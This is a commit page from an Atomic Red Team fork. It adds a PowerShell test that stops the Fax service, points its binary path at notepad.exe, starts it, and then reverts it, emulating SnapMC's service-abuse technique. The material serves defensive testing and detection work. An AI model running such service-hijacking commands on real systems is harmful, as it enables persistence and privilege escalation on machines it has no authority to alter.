security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adding T1543.006 Test 6 - Modify Service to Run Arbitrary Binary (Powershell) (#2653)

Browse Source 
* Adding T1543.006 Test 6

* Update T1543.003.yaml

---------

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Leo Verlod
2024-01-17 15:44:54 -06:00
committed by GitHub
parent 2723c2f750
commit b8e521c714
1 changed files with 31 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1543.003/T1543.003.yaml
+31 -1
View File
@@ -173,4 +173,34 @@ atomic_tests:
sc.exe \\#{remote_host} start #{service_name}
cleanup_command: |
sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
- name: Modify Service to Run Arbitrary Binary (Powershell)
description: |
This test will use PowerShell to temporarily modify a service to run an arbitrary executable by changing its binary path and will then revert the binary path change, restoring the service to its original state.
This technique was previously observed through SnapMC's use of Powerspolit's invoke-serviceabuse function.
[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of the service to modify
type: string
default: fax
new_bin_path:
description: Path of the new service binary
type: String
default: '$env:windir\system32\notepad.exe'
original_bin_path:
description: Path of the original service binary
type: String
default: '$env:windir\system32\fxssvc.exe'
executor:
command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{new_bin_path}"
start-service -Name "#{service_name}" -erroraction silentlycontinue | out-null
cleanup_command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{original_bin_path}" -erroraction silentlycontinue | out-null
name: powershell
elevation_required: true